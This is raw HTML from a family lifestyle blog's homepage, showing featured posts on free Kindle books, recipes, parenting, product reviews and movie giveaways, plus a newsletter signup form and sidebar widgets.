odd first post-91144 post type-post status-publish format-standard has-post-thumbnail category-books category-featured-posts category-kindle tag-books tag-e-books tag-free-kindle-books tag-kindle tag-kindle-books entry"><a href="https://seemomclick.com/10-free-kindle-books-thursday/" title="10 Free Kindle Books &#8211; Thursday" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2018/06/5-Under-5-Choice-B-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/10-free-kindle-books-thursday/">10 Free Kindle Books &#8211; Thursday</a></h2></header></article><article class="simple-grid one-third post-91140 post type-post status-publish format-standard has-post-thumbnail category-books category-kindle tag-books tag-e-books tag-free-kindle-books tag-kindle tag-kindle-books entry"><a href="https://seemomclick.com/10-free-kindle-books-wednesday/" title="10 Free Kindle Books &#8211; Wednesday" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2018/06/10-Free-Choice-C-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/10-free-kindle-books-wednesday/">10 Free Kindle Books &#8211; Wednesday</a></h2></header></article><article class="simple-grid one-third odd post-91127 post type-post status-publish format-standard has-post-thumbnail category-books category-kindle tag-books tag-e-books tag-free-kindle-books tag-kindle tag-kindle-books entry"><a href="https://seemomclick.com/10-free-kindle-books-tuesday/" title="10 Free Kindle Books &#8211; Tuesday" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2018/07/10-Free-Choice-A-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/10-free-kindle-books-tuesday/">10 Free Kindle Books &#8211; Tuesday</a></h2></header></article><p class="more-from-category"><a href="https://seemomclick.com/category/reading-list/" title="Reading List">View More</a></p></div></section> <section id="featured-post-8" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Home &#038; Family</h3> <article class="simple-grid one-third odd first post-98625 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-parenting tag-health tag-parenting entry"><a href="https://seemomclick.com/protect-your-kids-smiles-childrens-oral-health/" title="5 Ways to Protect Your Kids&#8217; Smiles: Be Your Child&#8217;s Oral Health Hero" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/04/childrens-oral-health-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/protect-your-kids-smiles-childrens-oral-health/">5 Ways to Protect Your Kids&#8217; Smiles: Be Your Child&#8217;s Oral Health Hero</a></h2></header></article><article class="simple-grid one-third post-98518 post type-post status-publish format-standard has-post-thumbnail category-family-fun category-featured-posts category-recipes tag-cake-recipes tag-dessert-recipes tag-party tag-recipes-2 entry"><a href="https://seemomclick.com/unique-birthday-cakes-for-kids/" title="Unique Birthday Cakes for Kids" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/04/Depositphotos_214514446_xl-2015-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/unique-birthday-cakes-for-kids/">Unique Birthday Cakes for Kids</a></h2></header></article><article class="simple-grid one-third odd post-82930 post type-post status-publish format-standard has-post-thumbnail category-eco-friendly category-featured-posts category-frugal-living tag-eco-friendly tag-frugal-living tag-project-envolve entry"><a href="https://seemomclick.com/spring-cleaning-tips-for-earth-day/" title="5 Green Spring Cleaning Tips for Earth Day" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="893" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2016/04/Green-spring-cleaning-tips-for-earth-day-680x893.jpg" class="entry-image attachment-post" alt="Earth Day is coming &amp; if you&#039;re like me you&#039;re also in the midst of a major spring cleaning purge. Here are 5 green spring cleaning to help you save!" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/spring-cleaning-tips-for-earth-day/">5 Green Spring Cleaning Tips for Earth Day</a></h2></header></article><p class="more-from-category"><a href="https://seemomclick.com/category/home-and-family/" title="Home and Family">View More</a></p></div></section> <section id="featured-post-9" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Shopping &#038; Reviews</h3> <article class="simple-grid one-third odd first post-98643 post type-post status-publish format-standard has-post-thumbnail category-best-buy tag-best-buy tag-electronics entry"><a href="https://seemomclick.com/uniden-r7-radar-detector/" title="Drive Safer With The New Uniden R7 Radar Detector" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="850" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/04/radar-detector-680x850.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/uniden-r7-radar-detector/">Drive Safer With The New Uniden R7 Radar Detector</a></h2></header></article><article class="simple-grid one-third post-82930 post type-post status-publish format-standard has-post-thumbnail category-eco-friendly category-featured-posts category-frugal-living tag-eco-friendly tag-frugal-living tag-project-envolve entry"><a href="https://seemomclick.com/spring-cleaning-tips-for-earth-day/" title="5 Green Spring Cleaning Tips for Earth Day" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="893" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2016/04/Green-spring-cleaning-tips-for-earth-day-680x893.jpg" class="entry-image attachment-post" alt="Earth Day is coming &amp; if you&#039;re like me you&#039;re also in the midst of a major spring cleaning purge. Here are 5 green spring cleaning to help you save!" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/spring-cleaning-tips-for-earth-day/">5 Green Spring Cleaning Tips for Earth Day</a></h2></header></article><article class="simple-grid one-third odd post-98459 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-wegmans tag-wegmans entry"><a href="https://seemomclick.com/wegmans-sushi/" title="Fresh, Delicious, Convenient: Wegmans Alpine King Salmon Sushi" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/03/featured-wegmans-sushi-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/wegmans-sushi/">Fresh, Delicious, Convenient: Wegmans Alpine King Salmon Sushi</a></h2></header></article><p class="more-from-category"><a href="https://seemomclick.com/category/shopping-and-reviews/" title="Shopping and Reviews">View More</a></p></div></section> <section id="featured-post-10" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Entertainment</h3> <article class="simple-grid one-third odd first post-98651 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-movies category-entertainment tag-movies tag-sonic-the-hedgehog entry"><a href="https://seemomclick.com/sonic-the-hedgehog-movie/" title="Sonic the Hedgehog Trailer: In Theaters November 2019" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/04/sonic-the-hedgehog-movie-trailer-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/sonic-the-hedgehog-movie/">Sonic the Hedgehog Trailer: In Theaters November 2019</a></h2></header></article><article class="simple-grid one-third post-98615 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-giveaways category-movies tag-giveaways tag-lego tag-movies entry"><a href="https://seemomclick.com/the-lego-movie-2-giveaway/" title="The Lego Movie 2: The Second Part on DVD + Giveaway!" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/04/The-Lego-Movie-2-DVD-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/the-lego-movie-2-giveaway/">The Lego Movie 2: The Second Part on DVD + Giveaway!</a></h2></header></article><article class="simple-grid one-third odd post-98534 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-giveaways category-movies tag-giveaways tag-missing-link tag-movies entry"><a href="https://seemomclick.com/missing-link-in-theaters-april-12/" title="Missing Link in Theaters April 12 + Giveaway" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/04/MissingLink_Poster_SM-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/missing-link-in-theaters-april-12/">Missing Link in Theaters April 12 + Giveaway</a></h2></header></article><p class="more-from-category"><a href="https://seemomclick.com/category/entertainment/" title="See Mom Chill">View More</a></p></div></section></div></main><aside class="sidebar sidebar-primary widget-area" role="complementary" aria-label="Primary Sidebar" itemscope itemtype="https://schema.org/WPSideBar" id="genesis-sidebar-primary"><h2 class="genesis-sidebar-title screen-reader-text">Primary Sidebar</h2><section id="simple-social-icons-4" class="widget simple-social-icons"><div class="widget-wrap"><ul class="aligncenter"><li class="ssi-facebook"><a href="https://www.facebook.com/SeeMomClick/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-facebook" aria-labelledby="social-facebook-4"><title id="social-facebook-4">Facebook</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-facebook"></use></svg></a></li><li class="ssi-instagram"><a href="https://www.instagram.com/seemomclick/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-instagram" aria-labelledby="social-instagram-4"><title id="social-instagram-4">Instagram</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-instagram"></use></svg></a></li><li class="ssi-linkedin"><a href="http://www.linkedin.com/in/lindsayfrank" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-linkedin" aria-labelledby="social-linkedin-4"><title id="social-linkedin-4">LinkedIn</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-linkedin"></use></svg></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/seemomclick/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-pinterest" aria-labelledby="social-pinterest-4"><title id="social-pinterest-4">Pinterest</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-pinterest"></use></svg></a></li><li class="ssi-twitter"><a href="https://twitter.com/seemomclick" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-twitter" aria-labelledby="social-twitter-4"><title id="social-twitter-4">Twitter</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-twitter"></use></svg></a></li><li class="ssi-youtube"><a href="http://www.youtube.com/user/PandorasDeals" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-youtube" aria-labelledby="social-youtube-4"><title id="social-youtube-4">YouTube</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-youtube"></use></svg></a></li></ul></div></section> <section id="custom_html-3" class="widget_text widget widget_custom_html"><div class="widget_text widget-wrap"><div class="textwidget custom-html-widget"><center><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2018/05/Bio.png" alt="About See Mom Click" width="350px" height="534px"> Writing about my favorite brands, recipes, & family travel. <a href="https://seemomclick.com/about-me/">Learn more →</a> <br><br> <a href="mailto:[email protected]">[email protected]</a></center></div></div></section> <section id="simple-social-icons-5" class="widget simple-social-icons"><div class="widget-wrap"><ul class="aligncenter"><li class="ssi-facebook"><a href="https://www.facebook.com/SeeMomClick/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-facebook" aria-labelledby="social-facebook-5"><title id="social-facebook-5">Facebook</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-facebook"></use></svg></a></li><li class="ssi-instagram"><a href="https://www.instagram.com/seemomclick/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-instagram" aria-labelledby="social-instagram-5"><title id="social-instagram-5">Instagram</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-instagram"></use></svg></a></li><li class="ssi-linkedin"><a href="http://www.linkedin.com/in/lindsayfrank" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-linkedin" aria-labelledby="social-linkedin-5"><title id="social-linkedin-5">LinkedIn</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-linkedin"></use></svg></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/seemomclick/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-pinterest" aria-labelledby="social-pinterest-5"><title id="social-pinterest-5">Pinterest</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-pinterest"></use></svg></a></li><li class="ssi-twitter"><a href="https://twitter.com/seemomclick" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-twitter" aria-labelledby="social-twitter-5"><title id="social-twitter-5">Twitter</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-twitter"></use></svg></a></li><li class="ssi-youtube"><a href="http://www.youtube.com/user/PandorasDeals" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-youtube" aria-labelledby="social-youtube-5"><title id="social-youtube-5">YouTube</title><use xlink:href="https://seemomclick.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-youtube"></use></svg></a></li></ul></div></section> <section id="search-3" class="widget widget_search"><div class="widget-wrap"><h3 class="widgettitle widget-title">Search</h3> <form class="search-form" itemprop="potentialAction" itemscope itemtype="https://schema.org/SearchAction" method="get" action="https://seemomclick.com/" role="search"><label class="search-form-label screen-reader-text" for="searchform-5cdd8a266e35b2.66552502">Search this website</label><input class="search-form-input" type="search" itemprop="query-input" name="s" id="searchform-5cdd8a266e35b2.66552502" placeholder="Search this website"><input class="search-form-submit" type="submit" value="Search"><meta itemprop="target" content="https://seemomclick.com/?s={s}"></form></div></section> <section id="custom_html-2" class="widget_text widget widget_custom_html"><div class="widget_text widget-wrap"><div class="textwidget custom-html-widget"><style>#mlb2-896524.ml-form-embedContainer{box-sizing:border-box;display:table;height:100%;margin:0 auto;position:static;width:100% !important;} #mlb2-896524.ml-form-embedContainer h4, #mlb2-896524.ml-form-embedContainer p, #mlb2-896524.ml-form-embedContainer span, #mlb2-896524.ml-form-embedContainer button{text-transform:none !important;letter-spacing:normal !important;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper{background-color:#f6f6f6;background-image:url(https://bucket.mlcdn.com/a/1021/1021648/images/ef926c925744098647769cc375fd476879ed0469.png);background-position:center center;background-repeat:no-repeat;background-size:cover;border-width:0px;border-color:#e6e6e6;border-radius:4px;border-style:solid;box-sizing:border-box;display:inline-block !important;margin:0;padding:0;position:relative;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper.embedPopup, #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper.embedDefault{width:350px;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper.embedForm{max-width:350px;width:100%;} #mlb2-896524.ml-form-embedContainer .ml-form-align-left{text-align:left;} #mlb2-896524.ml-form-embedContainer .ml-form-align-center{text-align:center;} #mlb2-896524.ml-form-embedContainer .ml-form-align-default{display:table-cell !important;vertical-align:middle !important;text-align:center !important;} #mlb2-896524.ml-form-embedContainer .ml-form-align-right{text-align:right;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedHeader img{border-top-left-radius:4px;border-top-right-radius:4px;height:auto;width:100%;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody, #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-successBody{padding:20px 20px 0 20px;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody.ml-form-embedBodyHorizontal{padding-bottom:0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-embedContent, #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-successBody .ml-form-successContent{margin:0 0 20px 0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-embedContent h4, #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-successBody .ml-form-successContent h4{color:#407fc1;font-family:'Open Sans', Arial, Helvetica, sans-serif;font-size:30px;font-weight:700;margin:0 0 10px 0;text-align:center;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-embedContent p, #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-successBody .ml-form-successContent p{color:#000000;font-family:'Open Sans', Arial, Helvetica, sans-serif;font-size:14px;font-weight:400;margin:0 0 10px 0;text-align:left;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-embedContent p a, #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-successBody .ml-form-successContent p a{color:#000000;text-decoration:underline;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-embedContent p:last-child, #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-successBody .ml-form-successContent p:last-child{margin:0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody form{margin:0;width:100%;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-formContent, #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-checkboxRow{margin:0 0 20px 0;width:100%;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-formContent.horozintalForm{margin:0;padding:0 0 20px 0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-fieldRow{margin:0 0 10px 0;width:100%;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-fieldRow.ml-last-item{margin:0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-fieldRow.ml-formfieldHorizintal{margin:0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-fieldRow input{background-color:#ffffff;color:#333333;border-color:#cccccc;border-radius:4px;border-style:solid;border-width:1px;font-size:14px;line-height:20px;padding:10px 10px;width:100%;box-sizing:border-box;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-fieldRow input::-webkit-input-placeholder{color:#333333;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-fieldRow input::-moz-placeholder{color:#333333;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-fieldRow input:-ms-input-placeholder{color:#333333;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-fieldRow input:-moz-placeholder{color:#333333;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-horizontalRow{height:42px;} .ml-form-formContent.horozintalForm .ml-form-horizontalRow .ml-input-horizontal{width:70%;float:left;} .ml-form-formContent.horozintalForm .ml-form-horizontalRow .ml-button-horizontal{width:30%;float:left;} .ml-form-formContent.horozintalForm .ml-form-horizontalRow .horizontal-fields{box-sizing:border-box;float:left;padding-right:10px;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-horizontalRow input{color:#333333;border-color:#cccccc;border-radius:4px;border-style:solid;border-width:1px;font-size:14px;line-height:20px;padding:10px 10px;width:100%;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-horizontalRow button{background-color:#407fc1;border-color:#407fc1;border-style:solid;border-width:1px;border-radius:4px;box-shadow:none;color:#ffffff !important;font-family:'Open Sans', Arial, Helvetica, sans-serif;font-size:14px !important;font-weight:700;line-height:20px;padding:10px !important;width:100%;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-horizontalRow button:hover{background-color:#333333;border-color:#333333;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-checkboxRow input[type="checkbox"]{display:inline-block;float:left;margin:1px 0 0 0;opacity:1;visibility:visible;appearance:checkbox;-moz-appearance:checkbox;-webkit-appearance:checkbox;height:14px;width:14px;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-checkboxRow .label-description{color:#000000;display:block;font-family:'Open Sans', Arial, Helvetica, sans-serif;font-size:12px;text-align:left;padding-left:25px;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-checkboxRow label{font-weight:normal;margin:0;padding:0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-checkboxRow label a{color:#000000;text-decoration:underline;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-checkboxRow label p{color:#000000 !important;font-family:'Open Sans', Arial, Helvetica, sans-serif !important;font-size:12px !important;line-height:18px !important;margin:0 5px 0 0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-checkboxRow label p:first-letter{color:#000000 !important;font-family:'Open Sans', Arial, Helvetica, sans-serif !important;font-size:12px !important;font-weight:normal !important;line-height:18px !important;padding:0 !important;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-checkboxRow label p:last-child{margin:0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-embedSubmit{margin:0 0 20px 0;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-embedSubmit button{background-color:#407fc1;border:none;border-radius:4px;box-shadow:none;color:#ffffff !important;font-family:'Open Sans', Arial, Helvetica, sans-serif;font-size:14px !important;font-weight:700;line-height:20px;padding:10px !important;width:100%;} #mlb2-896524.ml-form-embedContainer .ml-form-embedWrapper .ml-form-embedBody .ml-form-embedSubmit button:hover{background-color:#333333;} .ml-subscribe-close{width:30px;height:30px;background:url(https://bucket.mlcdn.com/images/default/modal_close.png) no-repeat;background-size:30px;cursor:pointer;margin-top:-10px;margin-right:-10px;position:absolute;top:0;right:0;} .ml-error input{background:url(https://bucket.mlcdn.com/images/default/error-icon.png) 98% center no-repeat #ffffff !important;background-size:24px 24px !important;} .ml-error .label-description{color:#ff0000 !important;} @media only screen and (max-width: 350px){ .ml-form-embedWrapper.embedDefault{width:100%!important;} .ml-form-formContent.horozintalForm{float:left!important;} .ml-form-formContent.horozintalForm .ml-form-horizontalRow{height:auto!important;width:100%!important;float:left!important;} .ml-form-formContent.horozintalForm .ml-form-horizontalRow .ml-input-horizontal{width:100%!important;} .ml-form-formContent.horozintalForm .ml-form-horizontalRow .ml-input-horizontal > div{padding-right:0px!important;padding-bottom:10px;} .ml-form-formContent.horozintalForm .ml-button-horizontal{width:100%!important;} }</style> <div id="mlb2-896524" class="ml-form-embedContainer ml-subscribe-form ml-subscribe-form-896524"> <div class="ml-form-align-center"> <div class="ml-form-embedWrapper embedForm"> <div class="ml-form-embedBody ml-form-embedBodyDefault row-form"> <div class="ml-form-embedContent"> <h4>See Mom Click Newsletter</h4> <p style="text-align: center;">Get the good stuff, direct to your inbox.</p></div><form class="ml-block-form" action="https://app.mailerlite.com/webforms/submit/z8l4u3" data-code="z8l4u3" method="post" target="_blank"> <div class="ml-form-formContent"> <div class="ml-form-fieldRow ml-last-item"> <div class="ml-field-group ml-field-email ml-validate-email ml-validate-required"> <input type="email" class="form-control" data-inputmask="" name="fields[email]" value="" placeholder="Email"></div></div></div><div class="ml-form-checkboxRow ml-validate-required"> <label class="checkbox"> <input type="checkbox"> <div class="label-description"> <p>The <a href="https://seemomclick.com/privacy-policy/" target="_blank" rel="noopener">See Mom Click® Privacy Policy</a> details what user information is collected and how it is used. Please review before checking this box to opt in to receive news and updates. </p></div></label></div><input type="hidden" name="ml-submit" value="1"> <div class="ml-form-embedSubmit"> <button type="submit" class="primary">Subscribe</button> <button disabled="disabled" style="display: none;" type="button" class="loading btn btn-block"> <img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" data-wpfc-original-src="https://static.mailerlite.com/images/rolling.gif" width="20" height="20" style="width: 20px; height: 20px; margin: 0 auto; display: block;" border="0"> </button></div></form></div><div class="ml-form-successBody row-success" style="display: none"> <div class="ml-form-successContent"> <h4>Thank you!</h4> <p>You have successfully joined our subscriber list.</p></div></div></div></div></div><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" data-wpfc-original-src="https://track.mailerlite.com/webforms/o/896524/z8l4u3?v3772b61f1ec61c541c401d4eadfdd02f" width="1" height="1" style="display: block;" border="0"></div></div></section> <section id="text-12" class="widget widget_text"><div class="widget-wrap"><h3 class="widgettitle widget-title">Enter to Win My Current Giveaways!</h3> <div class="textwidget"><ul> <li><a href="https://seemomclick.com/the-lego-movie-2-giveaway/" target="_blank" rel="noopener"><strong>The Lego Movie 2 on DVD (ends 5/6)</strong></a></li> </ul></div></div></section> </aside></div></div><div class="footer-widgets" id="genesis-footer-widgets"><h2 class="genesis-sidebar-title screen-reader-text">Footer</h2><div class="wrap"><div class="widget-area footer-widgets-1 footer-widget-area"><section id="media_image-2" class="widget widget_media_image"><div class="widget-wrap"><h3 class="widgettitle widget-title">Family Travel Inspiration</h3> <a href="https://seemomclick.com/category/travel/"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="300" height="214" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/02/where-to-stay-florida-keys-300x214.jpg" class="image wp-image-98321 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" data-wpfc-original-srcset="https://seemomclick.com/wp-content/uploads/2019/02/where-to-stay-florida-keys-300x214.jpg 300w, https://seemomclick.com/wp-content/uploads/2019/02/where-to-stay-florida-keys-768x548.jpg 768w, https://seemomclick.com/wp-content/uploads/2019/02/where-to-stay-florida-keys-735x525.jpg 735w, https://seemomclick.com/wp-content/uploads/2019/02/where-to-stay-florida-keys.jpg 850w" sizes="(max-width: 300px) 100vw, 300px" /></a></div></section></div><div class="widget-area footer-widgets-2 footer-widget-area"> <section id="recent-posts-3" class="widget widget_recent_entries"><div class="widget-wrap"> <h3 class="widgettitle widget-title">Here&#8217;s What&#8217;s New</h3> <ul> <li> <a href="https://seemomclick.com/10-free-kindle-books-thursday/">10 Free Kindle Books &#8211; Thursday</a> </li> <li> <a href="https://seemomclick.com/10-free-kindle-books-wednesday/">10 Free Kindle Books &#8211; Wednesday</a> </li> <li> <a href="https://seemomclick.com/unique-corn-on-the-cob-recipes/">Unique Corn on the Cob Recipes</a> </li> <li> <a href="https://seemomclick.com/10-free-kindle-books-tuesday/">10 Free Kindle Books &#8211; Tuesday</a> </li> <li> <a href="https://seemomclick.com/10-free-kindle-books-monday/">10 Free Kindle Books &#8211; Monday</a> </li> </ul></div></section></div><div class="widget-area footer-widgets-3 footer-widget-area"><section id="text-29" class="widget widget_text"><div class="widget-wrap"><h3 class="widgettitle widget-title">Disclosure</h3> <div class="textwidget"><p>See Mom Click is a participant in the Amazon Associates Program. As an Amazon Associate I earn from qualifying purchases. Please read my full <a href="https://seemomclick.com/disclosur/">Disclosure Policy</a> here.</p></div></div></section></div></div></div><footer class="site-footer" itemscope itemtype="https://schema.org/WPFooter"><div class="wrap"><p>&#x000A9;&nbsp;2019 See Mom Click&reg; &middot; Design by <a href="https://squishy.us">squishy</a></p></div></footer></div><style media="screen">#simple-social-icons-4 ul li a, #simple-social-icons-4 ul li a:hover, #simple-social-icons-4 ul li a:focus{background-color:#a4ce3a !important;border-radius:36px;color:#ffffff !important;border:0px #ffffff solid !important;font-size:18px;padding:9px;} 